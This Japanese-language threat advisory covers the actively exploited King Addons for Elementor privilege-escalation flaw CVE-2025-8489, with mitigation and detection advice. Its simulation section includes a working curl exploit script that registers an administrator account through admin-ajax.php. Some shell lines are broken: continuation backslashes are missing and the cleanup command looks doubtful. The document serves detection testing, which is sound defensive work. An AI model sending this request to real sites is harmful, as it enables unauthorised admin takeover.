SOC Prime Bias: クリティカル

08 12月 2025 20:57
newspaper icon Wordfence

エレメンターのKing Addonsにおける重大な脆弱性がアクティブに悪用されています

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Follow
エレメンターのKing Addonsにおける重大な脆弱性がアクティブに悪用されています
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


概要

ElementorのWordPressプラグイン「King Addons」における重大な認証されていない特権昇格の欠陥(CVE-2025-8489)が、攻撃者に管理者権限を持つ新しいユーザーを登録させることを可能にしています。このバグは2025年10月31日以来活発に悪用されており、Wordfenceは数万回の試行をブロックしています。攻撃者はadmin-ajax.phpエンドポイントに送信された巧妙なPOSTリクエストを介してこの問題を悪用します。バージョン24.12.92から51.1.14が影響を受けており、バージョン51.1.35で修正が行われています。

調査

Wordfenceのテレメトリーは、2025年11月9日と10日に著しい急増を含む48,400回以上の悪用試行を記録しました。最も活発な単一のIPv6ソースアドレスは2602:fa59:3:424::1でした。悪意のあるペイロードは、登録処理中にuser_roleパラメータを管理者に設定するHTTP POSTデータを使用します。悪意のある管理者アカウントの作成以外に追加のマルウェア展開は確認されませんでした。

緩和策

King Addons for Elementorをバージョン51.1.35以降にアップグレードしてください。2025年8月4日(プレミアム)および9月3日(無料)に出荷されたWordfenceファイアウォール保護を有効にしてください。不明な管理者アカウントを確認するためにWordPressのユーザーリストを監査し、疑わしいPOSTパターンについてログを継続的にレビューしてください。

対応

/wp-admin/admin-ajax.phpに対するPOSTトラフィックでuser_role=administratorを含むものにアラートを発生させます。不正なIPアドレスをブロックし、特に強調表示されたIPv6ソースに注意します。アカウントの衛生チェックを行い、許可されていない管理者ユーザーを削除します。観測されたリクエスト構造に調整されたホストベースのIDSシグネチャを展開します。

graph TB %% Class definitions Section classDef technique fill:#ffcc00 %% Node definitions tech_exploit_public_facing[“<b>Technique</b> – <b>T1190 公開向けアプリケーションの悪用</b><br />攻撃者は公開されているアプリケーションを悪用して初期アクセスを獲得する。”] class tech_exploit_public_facing technique tech_exploitation_priv_esc[“<b>Technique</b> – <b>T1068 特権昇格のための脆弱性悪用</b><br />攻撃者はソフトウェアの脆弱性を悪用し、システム上での権限を昇格させる。”] class tech_exploitation_priv_esc technique tech_account_manipulation[“<b>Technique</b> – <b>T1098 アカウント操作</b><br />攻撃者は目的達成のためにアカウントを作成、変更、または削除する。”] class tech_account_manipulation technique tech_valid_accounts[“<b>Technique</b> – <b>T1078 正規アカウント</b><br />攻撃者は正当な認証情報を入手し、アカウントへのアクセスに使用する。”] class tech_valid_accounts technique %% Edge connections showing attack flow tech_exploit_public_facing –>|leads_to| tech_exploitation_priv_esc tech_exploitation_priv_esc –>|leads_to| tech_account_manipulation tech_account_manipulation –>|leads_to| tech_valid_accounts

攻撃フロー

シミュレーション実行

前提条件: テレメトリーとベースラインの事前飛行チェックが合格したこと。

  • 攻撃の説明 & コマンド:
    対戦相手はKing Addons for ElementorプラグインのCVE-2025-8489を発見します。彼らは、admin-ajax.phpにPOSTリクエストを作成し、action=king_addons_user_registerというパラメータ(プラグインが要求する)を含めますand新しいユーザーの役割を管理者user_role=administratorを介して設定します。このリクエストを脆弱なエンドポイントに直接送信することで、攻撃者は事前の認証なしに特権を持つWordPressアカウントを入手します。ペイロードはリアルなウェブクライアントを再現するためにURLエンコードされています。

  • リグレッションテストスクリプト:

    #!/usr/bin/env bash
# King Addons for Elementor特権昇格(CVE‑2025‑8489)用エクスプロイトスクリプト

TARGET="http://webserver.example.com"
ENDPOINT="/wp-admin/admin-ajax.php"

# 作成されたPOSTデータ(URLエンコード済み)
POST_DATA="action=king_addons_user_register&user_login=eviladmin&user_email=evil@example.com&user_pass=P@ssw0rd!&user_role=administrator"

echo "[*] 悪用ペイロードを送信中..."
curl -s -o /dev/null -w "%{http_code}" -X POST "${TARGET}${ENDPOINT}" 
     -H "Content-Type: application/x-www-form-urlencoded" 
     --data "${POST_DATA}"

echo -e "n[+] 悪用送信完了。SIEMで生成されたアラートを確認してください。"

  • クリーンアップコマンド:

    # テスト中に作成された悪意のあるユーザーを削除
curl -X POST "http://webserver.example.com/wp-admin/admin-ajax.php" 
  -d "action=delete_user&user_id=$(curl -s "http://webserver.example.com/wp-json/wp/v2/users?search=eviladmin" | jq -r '.[0].id')"
echo "[*] クリーンアップ完了。"

SOCプライムのDetection as Codeプラットフォームに参加してください ビジネスに最も関連する脅威の可視性を向上させるために。開始をお手伝いし、即時の価値を提供するために、今すぐSOCプライムの専門家とミーティングを予約してください。

無料で参加